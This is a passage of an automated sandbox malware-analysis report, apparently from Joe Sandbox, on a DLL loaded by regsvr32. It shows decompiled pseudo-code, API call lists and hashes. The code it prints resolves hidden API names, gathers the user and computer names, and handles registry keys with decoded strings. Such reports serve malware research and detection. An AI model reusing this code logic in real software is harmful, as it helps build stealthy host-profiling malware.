                                                  					_t13 =  *_t40(_t28);
                                                  					_v8 = _t13;
                                                  					_t41 = E00C82049(_v8 +  *_t40(_a4) + 1);
                                                  					if(_t41 != 0) {
                                                  						strcpy(_t41, _t28);
                                                  						_pop(_t33);
                                                  						__imp__(_t41, _a4);
                                                  						_t36 = E00C87225(_t34, _t41, _a8);
                                                  						E00C89039(_t41);
                                                  						_t42 = E00C88E82(StrTrimA(_t36, "="), _t36);
                                                  						if(_t42 != 0) {
                                                  							E00C89039(_t36);
                                                  							_t36 = _t42;
                                                  						}
                                                  						_t43 = E00C8788B(_t36, _t33);
                                                  						if(_t43 != 0) {
                                                  							E00C89039(_t36);
                                                  							_t36 = _t43;
                                                  						}
                                                  					}
                                                  					E00C89039(_t28);
                                                  				}
                                                  				return _t36;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00C89401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,00C88321,253D7325,00000000,00000000,74ECC740,?,?,00C8A428,?), ref: 00C89468
                                                    • Part of subcall function 00C89401: sprintf.NTDLL ref: 00C89489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C8A428,?,010A95B0), ref: 00C88332
                                                  • lstrlen.KERNEL32(?,?,?,00C8A428,?,010A95B0), ref: 00C8833A
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • strcpy.NTDLL ref: 00C88351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00C8835C
                                                    • Part of subcall function 00C87225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00C8836B,00000000,?,?,?,00C8A428,?,010A95B0), ref: 00C8723C
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C8A428,?,010A95B0), ref: 00C88379
                                                    • Part of subcall function 00C88E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00C88385,00000000,?,?,00C8A428,?,010A95B0), ref: 00C88E8C
                                                    • Part of subcall function 00C88E82: _snprintf.NTDLL ref: 00C88EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: b647955194ee5e1ecdaea1f79f2303ae65a95885f06b625211f68f0f5cea07d3
                                                  • Instruction ID: 70040767ad6c6ff7287632f5e3cdb2a0df7139d55dc8c0af109ae3c9ea948961
                                                  • Opcode Fuzzy Hash: b647955194ee5e1ecdaea1f79f2303ae65a95885f06b625211f68f0f5cea07d3
                                                  • Instruction Fuzzy Hash: 2B11E333500624BB46227BF5AC85D7F269D9F897A83090026F504A7111DF39CE0277A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C86D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 00C86D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C86D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C86DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C86DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C86DC3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 8051d4ea26d02412c71e93518f0706597d6fd1272b23db52640f7bfd44e4098e
                                                  • Instruction ID: 9fa83286e5231fb21c63dc8355031c94867cfa581ecdf03ed3b127ea05f52838
                                                  • Opcode Fuzzy Hash: 8051d4ea26d02412c71e93518f0706597d6fd1272b23db52640f7bfd44e4098e
                                                  • Instruction Fuzzy Hash: 65314E32D00609ABDF01EFB8C844A9EB7BAAF49315F144465ED15EB220DB719E06CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C8692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t26;
                                                  				_Unknown_base(*)()* _t28;
                                                  				intOrPtr _t30;
                                                  				_Unknown_base(*)()* _t32;
                                                  				intOrPtr _t33;
                                                  				_Unknown_base(*)()* _t35;
                                                  				intOrPtr _t36;
                                                  				_Unknown_base(*)()* _t38;
                                                  				intOrPtr _t39;
                                                  				_Unknown_base(*)()* _t41;
                                                  				intOrPtr _t44;
                                                  				struct HINSTANCE__* _t48;
                                                  				intOrPtr _t54;
                                                  
                                                  				_t54 = E00C82049(0x20);
                                                  				if(_t54 == 0) {
                                                  					_v8 = 8;
                                                  				} else {
                                                  					_t23 =  *0xc8d27c; // 0x41a5a8
                                                  					_t1 = _t23 + 0xc8e11a; // 0x4c44544e
                                                  					_t48 = GetModuleHandleA(_t1);
                                                  					_t26 =  *0xc8d27c; // 0x41a5a8
                                                  					_t2 = _t26 + 0xc8e769; // 0x7243775a
                                                  					_v8 = 0x7f;
                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                  					 *(_t54 + 0xc) = _t28;
                                                  					if(_t28 == 0) {
                                                  						L8:
                                                  						E00C89039(_t54);
                                                  					} else {
                                                  						_t30 =  *0xc8d27c; // 0x41a5a8
                                                  						_t5 = _t30 + 0xc8e756; // 0x614d775a
                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                  						 *(_t54 + 0x10) = _t32;
                                                  						if(_t32 == 0) {
                                                  							goto L8;
                                                  						} else {
                                                  							_t33 =  *0xc8d27c; // 0x41a5a8
                                                  							_t7 = _t33 + 0xc8e40b; // 0x6e55775a
                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                  							 *(_t54 + 0x14) = _t35;
                                                  							if(_t35 == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t36 =  *0xc8d27c; // 0x41a5a8
                                                  								_t9 = _t36 + 0xc8e4d2; // 0x4e6c7452
                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                  								 *(_t54 + 0x18) = _t38;
                                                  								if(_t38 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									_t39 =  *0xc8d27c; // 0x41a5a8
                                                  									_t11 = _t39 + 0xc8e779; // 0x6c43775a
                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                  									 *(_t54 + 0x1c) = _t41;
                                                  									if(_t41 == 0) {
                                                  										goto L8;
                                                  									} else {
                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                  										_t44 = E00C8727B(_t54, _a8);
                                                  										_v8 = _t44;
                                                  										if(_t44 != 0) {
                                                  											goto L8;
                                                  										} else {
                                                  											 *_a12 = _t54;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  Instruction addresses (side-by-side code view): 0x00c8693b, 0x00c8693f, 0x00c86a01, 0x00c86945, 0x00c86945, 0x00c8694a, 0x00c8695d, 0x00c8695f, 0x00c86964, 0x00c8696c, 0x00c86973, 0x00c86977, 0x00c8697a, 0x00c869f9, 0x00c869fa, 0x00c8697c, 0x00c8697c, 0x00c86981, 0x00c86989, 0x00c8698d, 0x00c86990, 0x00000000, 0x00c86992, 0x00c86992, 0x00c86997, 0x00c8699f, 0x00c869a3, 0x00c869a6, 0x00000000, 0x00c869a8, 0x00c869a8, 0x00c869ad, 0x00c869b5, 0x00c869b9, 0x00c869bc, 0x00000000, 0x00c869be, 0x00c869be, 0x00c869c3, 0x00c869cb, 0x00c869cf, 0x00c869d2, 0x00000000, 0x00c869d4, 0x00c869da, 0x00c869df, 0x00c869e6, 0x00c869ed, 0x00c869f0, 0x00000000, 0x00c869f2, 0x00c869f5, 0x00c869f5, 0x00c869f0, 0x00c869d2, 0x00c869bc, 0x00c869a6, 0x00c86990, 0x00c8697a, 0x00c86a0f

                                                  APIs
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00C8207A,?,00000001,?,?,00000000,00000000), ref: 00C86951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C86973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C86989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C8699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C869B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C869CB
                                                    • Part of subcall function 00C8727B: memset.NTDLL ref: 00C872FA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 38b8339b8bac95b1ad44d1e861b19f2330de311b6c7af264e5d51d52e87b87b2
                                                  • Instruction ID: 5b2d450b3c41f6ad616da01147dd4a2cf7575ffb6830b9c95f7e6e6a4c546e43
                                                  • Opcode Fuzzy Hash: 38b8339b8bac95b1ad44d1e861b19f2330de311b6c7af264e5d51d52e87b87b2
                                                  • Instruction Fuzzy Hash: CD215EB160120ADFDB20EFA9DC84F6A77ECEB083487014169F655D7251D734EE009F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C87649() {
                                                  				long _v8;
                                                  				long _v12;
                                                  				int _v16;
                                                  				long _t39;
                                                  				long _t43;
                                                  				signed int _t47;
                                                  				signed int _t52;
                                                  				int _t56;
                                                  				int _t57;
                                                  				char* _t63;
                                                  				short* _t66;
                                                  
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				GetUserNameW(0,  &_v8);
                                                  				_t39 = _v8;
                                                  				if(_t39 != 0) {
                                                  					_v12 = _t39;
                                                  					_v8 = 0;
                                                  					GetComputerNameW(0,  &_v8);
                                                  					_t43 = _v8;
                                                  					if(_t43 != 0) {
                                                  						_v12 = _v12 + _t43 + 2;
                                                  						_t63 = E00C82049(_v12 + _t43 + 2 << 2);
                                                  						if(_t63 != 0) {
                                                  							_t47 = _v12;
                                                  							_t66 = _t63 + _t47 * 2;
                                                  							_v8 = _t47;
                                                  							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                  								L7:
                                                  								E00C89039(_t63);
                                                  							} else {
                                                  								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                                                  								_t52 = _v8;
                                                  								_v12 = _v12 - _t52;
                                                  								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                  									goto L7;
                                                  								} else {
                                                  									_t56 = _v12 + _v8;
                                                  									_t31 = _t56 + 2; // 0xc8a33a
                                                  									_v12 = _t56;
                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                                                  									_v8 = _t57;
                                                  									if(_t57 == 0) {
                                                  										goto L7;
                                                  									} else {
                                                  										_t63[_t57] = 0;
                                                  										_v16 = _t63;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v16;
                                                  			}

                                                  Instruction addresses (side-by-side code view): 0x00c87657, 0x00c8765a, 0x00c8765d, 0x00c87663, 0x00c87668, 0x00c8766e, 0x00c87676, 0x00c87679, 0x00c8767f, 0x00c87684, 0x00c87691, 0x00c8769e, 0x00c876a2, 0x00c876a4, 0x00c876a8, 0x00c876ab, 0x00c876bb, 0x00c8770d, 0x00c8770e, 0x00c876bd, 0x00c876c0, 0x00c876c7, 0x00c876ca, 0x00c876dd, 0x00000000, 0x00c876df, 0x00c876e2, 0x00c876e7, 0x00c876f5, 0x00c876f8, 0x00c87700, 0x00c87703, 0x00000000, 0x00c87705, 0x00c87705, 0x00c87708, 0x00c87708, 0x00c87703, 0x00c876dd, 0x00c87713, 0x00c87714, 0x00c87684, 0x00c8771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,00C8A338), ref: 00C8765D
                                                  • GetComputerNameW.KERNEL32(00000000,00C8A338), ref: 00C87679
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • GetUserNameW.ADVAPI32(00000000,00C8A338), ref: 00C876B3
                                                  • GetComputerNameW.KERNEL32(00C8A338,?), ref: 00C876D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00C8A338,00000000,00C8A33A,00000000,00000000,?,?,00C8A338), ref: 00C876F8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: c2eb33288987ace5d2332d78b241b894d63e35e3ac42f6d201915d34cad06d8c
                                                  • Instruction ID: eee6791447af2ace2851c98787423133cfc36e715ab6aaeed44610b24aea138b
                                                  • Opcode Fuzzy Hash: c2eb33288987ace5d2332d78b241b894d63e35e3ac42f6d201915d34cad06d8c
                                                  • Instruction Fuzzy Hash: D821D776900208FBCB11EFE9D988DEEBBB8EE44344B6045AAE511E7240E7309F44DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00C81585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __esi;
                                                  				long _t10;
                                                  				void* _t18;
                                                  				void* _t22;
                                                  
                                                  				_t9 = __eax;
                                                  				_t22 = __eax;
                                                  				if(_a4 != 0 && E00C87F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                  					L9:
                                                  					return GetLastError();
                                                  				}
                                                  				_t10 = E00C8A9AB(_t9, _t18, _t22, _a8);
                                                  				if(_t10 == 0) {
                                                  					ResetEvent( *(_t22 + 0x1c));
                                                  					ResetEvent( *(_t22 + 0x20));
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0xffffffff);
                                                  					_push(0);
                                                  					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                  					if( *0xc8d130() != 0) {
                                                  						SetEvent( *(_t22 + 0x1c));
                                                  						goto L7;
                                                  					} else {
                                                  						_t10 = GetLastError();
                                                  						if(_t10 == 0x3e5) {
                                                  							L7:
                                                  							_t10 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_t10 == 0xffffffff) {
                                                  					goto L9;
                                                  				}
                                                  				return _t10;
                                                  			}

                                                  Instruction addresses (side-by-side code view): 0x00c81585, 0x00c81592, 0x00c81594, 0x00c815f7, 0x00000000, 0x00c815f7, 0x00c815ac, 0x00c815b3, 0x00c815bf, 0x00c815c4, 0x00c815c6, 0x00c815c8, 0x00c815ca, 0x00c815cc, 0x00c815ce, 0x00c815da, 0x00c815ea, 0x00000000, 0x00c815dc, 0x00c815dc, 0x00c815e3, 0x00c815f0, 0x00c815f0, 0x00c815f0, 0x00c815e3, 0x00c815da, 0x00c815f5, 0x00000000, 0x00000000, 0x00c815fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00C811DA,?,?,00000000,00000000), ref: 00C815BF
                                                  • ResetEvent.KERNEL32(?), ref: 00C815C4
                                                  • GetLastError.KERNEL32 ref: 00C815DC
                                                  • GetLastError.KERNEL32(?,?,00000102,00C811DA,?,?,00000000,00000000), ref: 00C815F7
                                                    • Part of subcall function 00C87F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?,?,00000000), ref: 00C87F33
                                                    • Part of subcall function 00C87F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?), ref: 00C87F91
                                                    • Part of subcall function 00C87F27: lstrcpy.KERNEL32(00000000,00000000), ref: 00C87FA1
                                                  • SetEvent.KERNEL32(?), ref: 00C815EA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: f8c608b0da25c6257a3c6adc4a94e6e57531e9497c282807f3d2bb096a61db94
                                                  • Instruction ID: 2da50c62f6bd62907c22cbe47b6ddfe4dbb79216df0960b8cbf6eac4c5a94c62
                                                  • Opcode Fuzzy Hash: f8c608b0da25c6257a3c6adc4a94e6e57531e9497c282807f3d2bb096a61db94
                                                  • Instruction Fuzzy Hash: AD01A231104601ABD6307B71EC44F1F76ECEF84768F244A25F966D10F0D730E916A729
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C88F10(intOrPtr _a4) {
                                                  				void* _t2;
                                                  				long _t4;
                                                  				void* _t5;
                                                  				long _t6;
                                                  				void* _t7;
                                                  				void* _t13;
                                                  
                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                  				 *0xc8d26c = _t2;
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				_t4 = GetVersion();
                                                  				if(_t4 != 5) {
                                                  					L4:
                                                  					if(_t13 <= 0) {
                                                  						_t5 = 0x32;
                                                  						return _t5;
                                                  					}
                                                  					L5:
                                                  					 *0xc8d25c = _t4;
                                                  					_t6 = GetCurrentProcessId();
                                                  					 *0xc8d258 = _t6;
                                                  					 *0xc8d264 = _a4;
                                                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                  					 *0xc8d254 = _t7;
                                                  					if(_t7 == 0) {
                                                  						 *0xc8d254 =  *0xc8d254 | 0xffffffff;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				if(_t4 > 0) {
                                                  					goto L5;
                                                  				}
                                                  				_t13 = _t4 - _t4;
                                                  				goto L4;
                                                   			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00C86A90,?,?,00000001,?,?,?,00C8807D,?), ref: 00C88F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,00C8807D,?), ref: 00C88F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00C8807D,?), ref: 00C88F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00C8807D,?), ref: 00C88F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,00C8807D,?), ref: 00C88F7A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                   • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                   • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                   • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                   • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: f95c4a85679a51b875e4f44d7ee80f85d762dec91ddaa9078db1098a961bbf68
                                                  • Instruction ID: 93db355ff8ee161da211f97c4e36a51daaf941d90dd95dcfa2d043ae61ffa30c
                                                  • Opcode Fuzzy Hash: f95c4a85679a51b875e4f44d7ee80f85d762dec91ddaa9078db1098a961bbf68
                                                  • Instruction Fuzzy Hash: ECF0A930690341EAEB60BFB4AD48B1C3BB2AB45784F900519F262C61E0DB708909CB2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E00C817D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				signed int* _v16;
                                                  				char _v284;
                                                  				void* __esi;
                                                  				char* _t60;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr _t65;
                                                  				char _t68;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t75;
                                                  				void* _t78;
                                                  				void* _t88;
                                                  				void* _t97;
                                                  				void* _t98;
                                                  				char _t104;
                                                  				signed int* _t106;
                                                  				intOrPtr* _t107;
                                                  				void* _t108;
                                                  
                                                  				_t98 = __ecx;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t104 = _a16;
                                                  				if(_t104 == 0) {
                                                  					__imp__( &_v284,  *0xc8d33c);
                                                  					_t97 = 0x80000002;
                                                  					L6:
                                                  					_t60 = E00C8809F(0,  &_v284);
                                                  					_a8 = _t60;
                                                  					if(_t60 == 0) {
                                                  						_v8 = 8;
                                                  						L29:
                                                  						_t61 = _a20;
                                                  						if(_t61 != 0) {
                                                  							 *_t61 =  *_t61 + 1;
                                                  						}
                                                  						return _v8;
                                                  					}
                                                  					_t107 = _a24;
                                                  					if(E00C888B7(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                  						L27:
                                                  						E00C89039(_a8);
                                                  						goto L29;
                                                  					}
                                                  					_t65 =  *0xc8d27c; // 0x41a5a8
                                                  					_t16 = _t65 + 0xc8e8fe; // 0x65696c43
                                                  					_t68 = E00C8809F(0, _t16);
                                                  					_a24 = _t68;
                                                  					if(_t68 == 0) {
                                                  						L14:
                                                  						_t29 = _t107 + 0x14; // 0x102
                                                  						_t33 = _t107 + 0x10; // 0x3d00c8c0
                                                  						if(E00C8A635(_t103,  *_t33, _t97, _a8,  *0xc8d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                  							_t72 =  *0xc8d27c; // 0x41a5a8
                                                  							if(_t104 == 0) {
                                                  								_t35 = _t72 + 0xc8ea5f; // 0x4d4c4b48
                                                  								_t73 = _t35;
                                                  							} else {
                                                  								_t34 = _t72 + 0xc8e89f; // 0x55434b48
                                                  								_t73 = _t34;
                                                  							}
                                                  							if(E00C8816C(_t73,  *0xc8d334,  *0xc8d338,  &_a24,  &_a16) == 0) {
                                                  								if(_t104 == 0) {
                                                  									_t75 =  *0xc8d27c; // 0x41a5a8
                                                  									_t44 = _t75 + 0xc8e871; // 0x74666f53
                                                  									_t78 = E00C8809F(0, _t44);
                                                  									_t105 = _t78;
                                                  									if(_t78 == 0) {
                                                  										_v8 = 8;
                                                  									} else {
                                                  										_t47 = _t107 + 0x10; // 0x3d00c8c0
                                                  										E00C82659( *_t47, _t97, _a8,  *0xc8d338, _a24);
                                                  										_t49 = _t107 + 0x10; // 0x3d00c8c0
                                                  										E00C82659( *_t49, _t97, _t105,  *0xc8d330, _a16);
                                                  										E00C89039(_t105);
                                                  									}
                                                  								} else {
                                                  									_t40 = _t107 + 0x10; // 0x3d00c8c0
                                                  									E00C82659( *_t40, _t97, _a8,  *0xc8d338, _a24);
                                                  									_t43 = _t107 + 0x10; // 0x3d00c8c0
                                                  									E00C82659( *_t43, _t97, _a8,  *0xc8d330, _a16);
                                                  								}
                                                  								if( *_t107 != 0) {
                                                  									E00C89039(_a24);
                                                  								} else {
                                                  									 *_t107 = _a16;
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L27;
                                                  					}
                                                  					_t21 = _t107 + 0x10; // 0x3d00c8c0
                                                  					if(E00C86BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                  						_t106 = _v16;
                                                  						_t88 = 0x28;
                                                  						if(_v12 == _t88) {
                                                  							 *_t106 =  *_t106 & 0x00000000;
                                                  							_t26 = _t107 + 0x10; // 0x3d00c8c0
                                                  							E00C8A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                  						}
                                                  						E00C89039(_t106);
                                                  						_t104 = _a16;
                                                  					}
                                                  					E00C89039(_a24);
                                                  					goto L14;
                                                  				}
                                                  				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                  					goto L29;
                                                  				} else {
                                                  					_t103 = _a8;
                                                  					E00C8A8D8(_t104, _a8,  &_v284);
                                                  					__imp__(_t108 + _t104 - 0x117,  *0xc8d33c);
                                                  					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                  					_t97 = 0x80000003;
                                                  					goto L6;
                                                  				}
                                                   			}

                                                  APIs
                                                  • StrChrA.SHLWAPI(00C83C81,0000005F,00000000,00000000,00000104), ref: 00C81808
                                                  • lstrcpy.KERNEL32(?,?), ref: 00C81835
                                                    • Part of subcall function 00C8809F: lstrlen.KERNEL32(?,00000000,00C8D330,00000001,00C82200,00C8D00C,00C8D00C,00000000,00000005,00000000,00000000,?,?,?,00C896C1,00C823E9), ref: 00C880A8
                                                    • Part of subcall function 00C8809F: mbstowcs.NTDLL ref: 00C880CF
                                                    • Part of subcall function 00C8809F: memset.NTDLL ref: 00C880E1
                                                    • Part of subcall function 00C82659: lstrlenW.KERNEL32(00C83C81,?,?,00C819A9,3D00C8C0,80000002,00C83C81,00C88B1E,74666F53,4D4C4B48,00C88B1E,?,3D00C8C0,80000002,00C83C81,?), ref: 00C82679
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00C81857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                   • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                   • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                   • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                   • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: d635e23f7708d1268480f5ffe0fdef74b4e5a642e077772fe7a46410f955a8a3
                                                  • Instruction ID: 288e14c200596e4a3b7c922039785d92cd65060a77d9fbf3711a210b1e54cdfe
                                                  • Opcode Fuzzy Hash: d635e23f7708d1268480f5ffe0fdef74b4e5a642e077772fe7a46410f955a8a3
                                                  • Instruction Fuzzy Hash: C9514772100209EFDF11BFA1DD45EAE37FEAB08358F148415FA26971A1E731DE16AB18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
